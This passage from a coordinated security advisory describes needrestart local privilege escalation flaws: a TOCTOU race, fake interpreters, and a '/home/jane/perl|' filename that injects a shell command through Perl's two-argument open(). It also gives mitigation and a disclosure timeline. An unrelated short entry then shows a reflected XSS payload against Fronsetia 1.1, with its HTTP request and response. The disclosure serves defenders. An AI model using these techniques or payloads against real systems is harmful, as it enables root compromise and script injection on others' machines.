------------------------------------------------------------------------  
166 sub needrestart_interp_check($$$$$) {  
167     my $debug = shift;  
168     my $pid = shift;  
169     my $bin = shift;  
170     my $blacklist = shift;  
171     my $tolerance = shift;  
...  
176         if($interp->isa($pid, $bin)) {  
------------------------------------------------------------------------  
 40 sub isa {  
 41     my $self = shift;  
 42     my $pid = shift;  
 43     my $bin = shift;  
 44   
 45     return 1 if($bin =~ m@^/usr/(local/)?bin/python([23][.\d]*)?$@);  
 46   
 47     return 0;  
 48 }  
------------------------------------------------------------------------

In fact, this code used to be vulnerable to CVE-2022-30688, a Local  
Privilege Escalation reported by Jakub Wilk: the regular expression at  
line 45 used to be unanchored (i.e., "/usr/(local/)?bin/python" instead  
of "^/usr/(local/)?bin/python([23][.\d]*)?$"), so local attackers could  
simply run their own, fake "/home/jane/usr/bin/python" (for example) and  
needrestart would later execute this fake Python interpreter as root (as  
if it were the system's real Python interpreter, at line 203).

We tried to bypass the fixed, anchored regular expression at line 45,  
but we failed. However, we eventually realized that the filename that is  
checked at line 45 is not necessarily the same filename that is executed  
at line 203: the filename that is checked is read from /proc/pid/exe in  
the middle of needrestart's main loop (at line 520), but the filename  
that is executed ("$ptable->{exec}" at line 203) was first read from  
/proc/pid/exe long before needrestart entered its main loop.

In other words, needrestart is vulnerable to a TOCTOU race condition  
(time-of-check, time-of-use). For example, our exploit /home/jane/race  
waits for needrestart to read our /proc/pid/exe for the first time (we  
use inotify to reliably win this race), and then quickly execve()s the  
system's real Python interpreter with a script that simply sleep()s for  
some time. As a result, needrestart does its checks on the real Python  
interpreter, but executes our own /home/jane/race instead, as root.

Note: needrestart's support code for the Ruby interpreter seems equally  
vulnerable, but we have not investigated this any further.

========================================================================  
CVE-2024-10224 (and CVE-2024-11003)  
========================================================================

After we had discovered CVE-2024-48990 and CVE-2024-48991 in  
needrestart's support code for the Python interpreter (and Ruby), we  
began to wonder whether the support code for the Perl interpreter might  
also be vulnerable to a Local Privilege Escalation.

Unlike needrestart's support code for Python and Ruby, the support code  
for Perl does not execute the Perl interpreter itself: instead, it calls  
the scan_deps() function from Perl's ScanDeps module, which analyzes a  
Perl script by recursively reading its source files.

We therefore grepped the ScanDeps module for one of the oldest pitfalls  
of the Perl programming language: the two-argument form of open(), which  
allows attackers to execute arbitrary shell commands if they control the  
name of the file to be open()ed (for example, "commands|"). For more  
information, please refer to rain.forest.puppy's 1999 Phrack article  
("That pesky pipe" section) and the SEI CERT Perl Coding Standard:

  https://phrack.org/issues/55/7.html#article  
  https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88890543

Incredibly, we found a match, at line 871 in ScanDeps.pm:

------------------------------------------------------------------------  
 868 sub scan_file{  
 869     my $file = shift;  
 870     my %found;  
 871     open my $fh, $file or die "Cannot open $file: $!";  
------------------------------------------------------------------------

In our exploit, we simply run a Perl script named "/home/jane/perl|"  
(which sleep()s forever), and as soon as needrestart calls scan_deps()  
to analyze our script, "/home/jane/perl|" is open()ed (at line 871), but  
because this filename ends with a "|" it is treated as a shell command,  
and our own "/home/jane/perl" is executed instead, as root.

Last-minute update: while reviewing needrestart's patches for these  
vulnerabilities, we have discovered that Perl's ScanDeps module is also  
trivially exploitable through various calls to eval() ("string" eval()s,  
https://perldoc.perl.org/functions/eval). Consequently and impressively,  
in response to our advisory:

- all of ScanDeps's vulnerable calls to open() and eval() have been  
  patched, thus fixing CVE-2024-10224;

- needrestart's dependence on ScanDeps has been completely removed (it  
  uses a simple regex-based approach now), thus fixing CVE-2024-11003.

========================================================================  
Mitigation  
========================================================================

As already recommended by needrestart's advisory for CVE-2022-30688  
(from https://www.openwall.com/lists/oss-security/2022/05/17/9):

------------------------------------------------------------------------  
Disabling the interpreter heuristic in needrestart's config prevents  
this attack:

 # Disable interpreter scanners.  
 $nrconf{interpscan} = 0;  
------------------------------------------------------------------------

========================================================================  
Acknowledgments  
========================================================================

We thank needrestart's maintainer (Thomas Liske), Module::ScanDeps's  
maintainers (Roderich Schupp in particular), the Ubuntu Security Team  
(Mark Esler in particular), and distros@openwall (Salvatore Bonaccorso  
from the Debian Security Team in particular) for their outstanding work;  
it has been a real pleasure to collaborate on this coordinated release.

We also thank Adam Boileau (@metlstorm) and Rodrigo Branco (@bsdaemon)  
for their very kind words about our work; they mean the world to us:

  https://risky.biz/RB755/  
  https://phrack.org/issues/71/2.html#article

========================================================================  
Timeline  
========================================================================

2024-10-04: We sent our advisory and exploits to the Ubuntu Security  
Team, and asked them if they could help us to coordinate this disclosure  
with the upstream projects and distros@openwall; they gladly accepted.

2024-10-08: The Ubuntu Security Team sent our advisory and exploits to  
needrestart's maintainer; we then started a very constructive exchange  
of patches and patch reviews.

2024-10-18: The Ubuntu Security Team opened GHSA-g597-359q-v529, a  
private GitHub repository to collaborate on this disclosure with  
Module::ScanDeps's maintainers.

2024-11-11: The Ubuntu Security Team sent our advisory and all of  
needrestart's and Module::ScanDeps's patches to distros@openwall.

2024-11-19: Coordinated Release Date (16:00 UTC).

needrestart Local Privilege Escalation

fronsetia version 1.1 suffers from a cross site scripting vulnerability.

    # Exploit Title: Reflected XSS - fronsetiav1.1# Date: 11/2024# Exploit Author: Andrey Stoykov# Version: 1.1# Tested on: Debian 12# Blog:https://msecureltd.blogspot.com/2024/11/friday-fun-pentest-series-14-reflected.htmlReflected XSS #1 - "show_operations.jsp"Steps to Reproduce:1. Visit main page of the application.2. In the input field of "WSDL Location" enter the following payload "><imgsrc=x onerror=alert(1)>// HTTP GET RequestGET/fronsetia/show_operations.jsp?Fronsetia_WSDL=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3EHTTP/1.1Host: 192.168.78.128:8080User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0)Gecko/20100101 Firefox/133.0[...]// HTTP ResponseHTTP/1.1 200Content-Type: text/html;charset=ISO-8859-1Content-Length: 6360Date: Wed, 20 Nov 2024 19:42:15 GMTKeep-Alive: timeout=20Connection: keep-alive[...]<title> Fronsetia: "><img src=x onerror=alert(1)> </title>[...]

Tag

#debian